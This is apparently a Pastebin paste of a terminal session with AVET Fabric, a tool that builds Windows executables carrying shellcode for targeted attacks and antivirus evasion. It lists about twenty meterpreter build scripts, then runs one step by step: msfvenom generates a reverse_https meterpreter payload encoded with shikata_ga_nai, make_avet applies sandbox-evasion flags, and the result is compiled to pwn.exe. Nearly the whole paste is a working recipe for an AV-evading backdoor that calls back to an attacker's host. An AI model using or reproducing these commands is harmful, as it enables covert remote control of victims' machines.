Advertisement
TVT618

Quick example of Avet

Jan 28th, 2019
2,384
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.64 KB | None | 0 0
  1. .| , +
  2. * | | (( *
  3. |'| ` ._____
  4. + ___ | | * |. |' .---"|
  5. _ .-' '-. | | .--'| || | _| |
  6. .-'| _.| | || '-__ | | | || |
  7. |' | |. | || | | | | || |
  8. ___| '-' ' "" '-' '-.' '` |____
  9. jgs~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10.  
  11. AVET Fabric by Daniel Sauder
  12.  
  13. avet_fabric.py is an assistant for building exe files with shellcode payloads for targeted attacks and antivirus evasion.
  14.  
  15. 0: build_win32_meterpreter_rev_https_shikata_fopen.sh
  16. 1: build_win32_meterpreter_rev_https_fopen_shikata.sh
  17. 2: buildsvc_win32_meterpreter_bind_tcp_20xshikata.sh
  18. 3: build_win32_meterpreter_rev_https_50xshikata_quiet.sh
  19. 4: build_win32_meterpreter_rev_https_shikata_raw_loadfile.sh
  20. 5: build_win32_meterpreter_rev_https_ASCIIMSF_cmd.sh
  21. 6: build_win32_meterpreter_rev_https_shikata_downloadexecshellcode.sh
  22. 7: build_win32_shell_rev_tcp_shikata_fopen_kaspersky.sh
  23. 8: build_win32_meterpreter_rev_https_ASCIIMSF.sh
  24. 9: build_win32_meterpreter_rev_https_killswitch_shikata.sh
  25. 10: build_win32_meterpreter_rev_https_shikata_download_powershell_raw_loadfile.sh
  26. 11: build_win32_meterpreter_rev_https_shikata_load_ie_debug.sh
  27. 12: build_win32_meterpreter_rev_https_shikata_download_certutil_raw_loadfile.sh
  28. 13: build_win32_meterpreter_rev_https_50xshikata.sh
  29. 14: build_win32_meterpreter_rev_https_shikata_loadfile.sh
  30. 15: build_win32_meterpreter_unstaged_rev_https_40xshikata.sh
  31. 16: build_win32_meterpreter_rev_https_shikata_downloadexecshellcode_DKMC.sh
  32. 17: build_win32_meterpreter_rev_https_fopen_shikata_quiet.sh
  33. 18: build_win64_meterpreter_rev_tcp_xor.sh
  34. 19: build_win32_meterpreter_rev_https_shikata_load_ie.sh
  35. 20: build_win64_meterpreter_rev_tcp_xor_downloadexecshellcode.sh
  36. 21: build_win64_meterpreter_rev_tcp_xor_fopen.sh
  37. Input number of the script you want use and hit enter: 0
  38.  
  39. Now you can edit the build script line by line.
  40.  
  41. simple example script for building the .exe file
  42. include script containing the compiler var $win32_compiler
  43. you can edit the compiler in build/global_win32.sh
  44. or enter $win32_compiler="mycompiler" here
  45. $ . build/global_win32.sh
  46. import global default lhost and lport values from build/global_connect_config.sh
  47. $ . build/global_connect_config.sh
  48. override connect-back settings here, if necessary
  49. $ LPORT=$GLOBAL_LPORT
  50. $ LHOST=$GLOBAL_LHOST
  51. make meterpreter reverse payload, encoded with shikata_ga_nai
  52. additionaly to the avet encoder, further encoding should be used
  53. $ msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > sc.txt
  54. format the shellcode for make_avet
  55. $ ./format.sh sc.txt > scclean.txt && rm sc.txt
  56. call make_avet, the -f compiles the shellcode to the exe file, the -F is for the AV sandbox evasion
  57. $ ./make_avet -f scclean.txt -F -E
  58. compile to pwn.exe file
  59. $ $win32_compiler -o pwn.exe avet.c
  60. cleanup
  61. $ rm scclean.txt && echo "" > defs.h
  62.  
  63. The following commands will be executed:
  64. #/bin/bash
  65. . build/global_win32.sh
  66. . build/global_connect_config.sh
  67. LPORT=$GLOBAL_LPORT
  68. LHOST=$GLOBAL_LHOST
  69. msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > sc.txt
  70. ./format.sh sc.txt > scclean.txt && rm sc.txt
  71. ./make_avet -f scclean.txt -F -E
  72. $win32_compiler -o pwn.exe avet.c
  73. rm scclean.txt && echo "" > defs.h
  74.  
  75. Press enter to continue.
  76.  
  77. Building the output file...
  78.  
  79. Please stand by...
  80.  
  81. The output file should be placed in the current directory.
  82.  
  83. Bye...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement